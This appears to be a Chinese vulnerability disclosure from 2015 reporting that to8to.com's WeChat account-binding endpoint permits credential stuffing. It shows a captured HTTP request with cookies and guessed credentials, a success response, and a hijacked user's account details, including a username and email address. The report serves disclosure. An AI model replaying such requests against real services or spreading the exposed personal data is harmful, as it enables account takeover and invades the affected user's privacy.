2015-09-16: 细节已通知厂商并且等待厂商处理中 2015-09-17: 厂商已经确认,细节仅向厂商公开 2015-09-27: 细节向核心白帽子及相关领域专家公开 2015-10-07: 细节向普通白帽子公开 2015-10-17: 细节向实习白帽子公开 2015-11-01: 细节向公众公开
微信端 土巴兔抓包如下
POST /ownerCenter/bindCompany/id/ZTQ4Zmx1b3JHSmZ1WWZQU3oyOGE3NjhFa01SVnk3WHlsejk2TkNkcTFOSzZqTnQxZjFQaHBldTFUeDIycVZUMTVEbzBteEV3WEJJY04xRnRQNUk0dVFPdW5QWFEwVDVPcFluYWQxTXVnNGlUaGxiVlJwZw%3D%3D/rand/9941 HTTP/1.1Host: m.to8to.comAccept-Language: zh-cnUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143 MicroMessenger/6.2.4 NetType/WIFI Language/zh_CNX-Requested-With: XMLHttpRequestAccept: application/json, text/javascript, */*; q=0.01Referer: http://m.to8to.com/ownerCenter/bind/type/3?code=031e47f29807f85c7751797337f9d93J&state=hoevenContent-Type: application/x-www-form-urlencoded; charset=UTF-8Connection: closeCookie: PHPSESSID=msadan7ieo7jfjne1mvbng7255; Hm_lpvt_dbdd94468cf0ef471455c47f380f58d2=1442367509; Hm_lvt_dbdd94468cf0ef471455c47f380f58d2=1442358516,1442367267; to8to_cook=OkOcClPzRWV8ZFJlCIF4Ag==; to8to_landpage=http%3A//m.to8to.com/ownerCenter/index/%3Fcode%3D021a099ee677577ca53bc3dcc00871cN%26state%3Dhoeven; to8to_landtime=1442358515; to8to_nowpage=http%253A%252F%252Fm.to8to.com%252FownerCenter%252Fbind%252Ftype%252F3%253Fcode%253D031e47f29807f85c7751797337f9d93J%2526state%253Dhoeven; to8to_sourcepage=; to8to_tcode=sz; to8to_tname=%E6%B7%B1%E5%9C%B3; to8to_townid=1130; to8tocookieid=f313e2a500ff0527e5b82f0983fc65aa342656; uid=wKgCulX4pO2hZwqGC2KIAg==Content-Length: 27Origin: http://m.to8to.comAccept-Encoding: gzip, deflatename=aaa&password=123456
对那么进行撞库看下图
{"msg":"绑定成功","code":"200","type":1,"cid":"119813","url":"https:\/\/open.weixin.qq.com\/connect\/oauth2\/authorize?appid=wx23b5153a96c64877&redirect_uri=http%3A%2F%2Fm.to8to.com%2FownerCenter%2Findex%2F&response_type=code&scope=snsapi_userinfo&state=hoeven#wechat_redirect"}
然后登陆下 看看
{"version":"2.5","action":"UserDetailAction","errorCode":0,"allRows":0,"data":{"uid":119813,"username":"xuyong","indentity":"0","goodlevel":"0","isactive":"0","nick":"xuyong","regdate":"1273493602","email":"","oldemail":"406050388@qq.com","name_rz":"0","subdomain":"xuyong","credits":"6","cost_credits":"0","mobiles":"","regsource":"1","province":"","city":"","avatar":"","liveid":"2663921","style":[{"typeId":15,"value":"\u73b0\u4ee3"}],"house_type":7,"house_type_name":"\u4e00\u5c45","area":0,"type_id":0,"type_name":"","company_id":"","company_name":"","needupdate":1,"community_id":"","community_name":"","hasname":0,"sign":0,"progress_id":1,"newmessage":0,"projectNum":0,"projectId":0}}
可登陆微信端和APP等,我就不截图了
完善机制
危害等级:低
漏洞Rank:5
确认时间:2015-09-17 09:17
感谢反馈
暂无